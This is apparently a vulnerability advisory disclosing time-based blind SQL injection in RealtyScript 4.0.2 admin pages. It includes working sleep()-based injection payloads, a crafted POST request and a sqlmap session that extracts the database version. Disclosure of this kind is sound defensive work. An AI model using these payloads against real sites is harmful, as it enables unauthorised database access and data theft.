RealtyScript v4.0.2 Multiple Time-based Blind SQL Injection Vulnerabilities Vendor: Next Click Ventures Product web page: http://www.realtyscript.com Affected version: 4.0.2 Summary: RealtyScript is award-winning real estate software that makes it effortless for a real estate agent, office, or entrepreneur to be up and running with a real estate web site in minutes. The software is in daily use on thousands of domain names in over 40 countries and has been translated into over 25 languages. Desc: RealtyScript suffers from multiple SQL Injection vulnerabilities. Input passed via the GET parameter 'u_id' and the POST parameter 'agent[]' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Tested on: Apache/2.4.6 (CentOS) PHP/5.4.16 MariaDB-5.5.41 Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2015-5270 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5270.php 01.10.2015 -- (1) GET /admin/users.php?req=remove&u_id=103 and (select * from (select(sleep(66)))a)-- & HTTP/1.1 (2) POST /admin/mailer.php HTTP/1.1 Host: TARGET Content-Length: 62 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://TARGET Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://TARGET/admin/mailer.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8 Cookie: PHPSESSID=vaq21340scj2u53a1b96ehvid5; agent[]=102 and (select * from (select(sleep(67)))a)-- &subject=test&message=t00t^^&submit_mailer=Send ====================================== .sqlmap session output ======================================= $ sqlmap -r request1.txt -p "u_id" --dbms=MySQL --os=Linux --sql-query="SELECT @@version" _ ___ ___| |_____ ___ ___ {1.0-dev-04c1d43} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. [*] starting at 14:36:36 [14:36:36] [INFO] parsing HTTP request from 'request1.txt' [14:36:36] [INFO] testing connection to the target URL sqlmap identified the following injection points with a total of 0 HTTP(s) requests: --- Parameter: u_id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: req=remove&u_id=103 AND (SELECT * FROM (SELECT(SLEEP(5)))YrMM) --- [14:36:36] [INFO] testing MySQL [14:36:36] [INFO] confirming MySQL [14:36:36] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS web application technology: Apache 2.4.6, PHP 5.4.16 back-end DBMS: MySQL >= 5.0.0 [14:36:36] [INFO] fetching SQL SELECT statement query output: 'SELECT @@version' [14:36:36] [WARNING] time-based comparison requires larger statistical model, please wait.............................. [14:36:45] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y [14:37:03] [INFO] adjusting time delay to 2 seconds due to good response times 5.5.41-MariaDB SELECT @@version: '5.5.41-MariaDB' [14:38:50] [INFO] fetched data logged to text files under '/.sqlmap/output/TARGET' [*] shutting down at 14:38:50 ======================================= sqlmap session output. ======================================